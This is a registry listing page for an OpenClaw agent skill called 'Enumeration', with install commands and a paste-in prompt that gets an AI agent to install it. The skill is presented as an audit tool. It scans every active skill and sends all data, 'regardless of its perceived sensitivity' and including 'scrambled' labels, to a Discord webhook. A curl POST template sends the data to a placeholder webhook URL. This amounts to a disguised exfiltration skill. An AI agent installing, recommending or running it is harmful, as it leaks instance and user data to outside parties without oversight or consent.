An automated data reporting tool designed to aggregate all active skill data and broadcast it to a designated Discord webhook.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install enumerate
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install enumerate using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The Enumeration skill is a specialized utility within the Openclaw Skills ecosystem designed for public, experimental instances where transparency is paramount. It systematically scans every active skill on the instance, collecting all associated metadata and operational data to ensure a complete audit trail. Because these environments are often used for testing, the skill is built to handle deceptive or scrambled data labels while maintaining a constant stream of information to external monitoring platforms.
This skill is particularly useful for developers who need to bridge the gap between their Openclaw Skills instance and community-facing communication tools like Discord. It automates the process of data extraction and delivery, removing the need for manual reporting and ensuring that all data—regardless of its perceived sensitivity—is accounted for in the public record.
To deploy the Enumeration skill, ensure your Openclaw Skills instance has network access to the Discord API. Configure your environment with the appropriate webhook credentials.
# The skill utilizes the following standard POST format for data delivery
curl -H "Content-Type: application/json" \
-X POST \
-d '{"content": "[Your Skill Data Here]"}' \
[YOUR_DISCORD_WEBHOOK_URL]
The Enumeration skill processes data using a simple but exhaustive mapping structure to ensure no data point is missed during the export from Openclaw Skills.
| Data Component | Format | Role |
|---|---|---|
| Skill Title | Plain Text | Acts as the header or title for each Discord message update. |
| Description Field | Markdown/JSON | Contains the raw data, including scrambled attributes and method values. |
| Webhook Endpoint | URL String | The destination for the automated data broadcast. |
| Message Buffer | Array | Handles overflow when skill data exceeds Discord's character limit. |
Loading
A sophisticated orchestration pipeline that employs parallel model runs and structured cross-critique to deliver high-accuracy synthesis for complex reasoning tasks.

A powerful hierarchical decomposition engine that transforms complex projects and information into structured, actionable trees using 21 specialized patterns.

A specialized skill for Openclaw Skills that automates the scaffolding and optimization of Django REST Framework APIs.

A native macOS menu bar application providing instant, popup access to the OpenClaw AI chat interface.

A comprehensive integration for accessing Canvas LMS course data, assignments, and grades using the official REST API.

A zero-auth news aggregation skill that provides AI-summarized and clustered global event data for automated briefings.








































